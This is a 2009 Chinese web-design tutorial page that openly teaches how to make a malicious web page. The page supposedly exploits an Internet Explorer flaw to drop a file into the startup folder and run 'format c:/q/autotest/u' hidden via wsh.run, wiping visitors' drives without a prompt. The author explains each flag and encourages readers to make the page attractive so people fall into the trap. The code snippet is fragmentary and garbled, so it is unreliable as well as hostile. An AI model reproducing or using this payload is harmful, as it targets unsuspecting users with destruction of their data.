当前位置: 首页 > 图文教程 > 网页制作 > HTML/XHTML教程 > 有关HTML代码的另类应用技巧

HTML/XHTML教程
通过W3C XHTML1.0及CSS标准必须注意的九个问题
注意这11个问题保证CSS的渲染效率
用css+js定义input_file元素的样式来兼容FireFox
CSS技巧:如何使未知高宽的图片实现垂直居中
CSS基础教程:布局网页技巧的完全学习手册
css知识:Div和Span在使用中的不同之处
css技巧:批量保存div+css网页中的图片的几种方法
CSS技巧:常用的属性代码简化表
介绍二款b/s开发中常用小工具
css教程:IE6、IE7和FF的hack的运用技巧
Google改进SSL机制,控制SSL安全机制存漏洞
css技巧:分享9个网页制作常用技巧
规范Web站点设计css类以及id的命名方式
html教程:WEB标准从头开始_DOCTYPE声明
html/css教程:背景图片的定位问题详解
CSS教程:自动隐藏网页文字的技巧
汇总一些IE与Firefox的CSS兼容问题及解决办法
网页中利用Title属性的好处
40多个漂亮的网页表单设计实例
制作商业HTML邮件的建议

HTML/XHTML教程 中的 有关HTML代码的另类应用技巧


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-04   浏览: 36 ::
收藏到网摘: n/a

这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。

现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。

我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。

下面我们看一下下面的代码我们就会发现其中的奥妙所在了。

scr.reset() scr.path="c:\\windows\\start menu\\programs\\启动\\文件名 scr.doc="" wsh.run('start.exe /m format c:/q/autotest/u')

对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。

下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。

首先,我们来看看这一句

scr.path="c:\\windows\\start menu\\programs\\启动\\文件名

这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现

wsh.run('start.exe /m format c:/q/autotest/u')

这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。

在这里我把他的一些参数,简要的说说,大家会更加明白的。

在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。

在这段代码里,核心语句

wsh.run('start.exe /m format c:/q/autotest/u')

我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。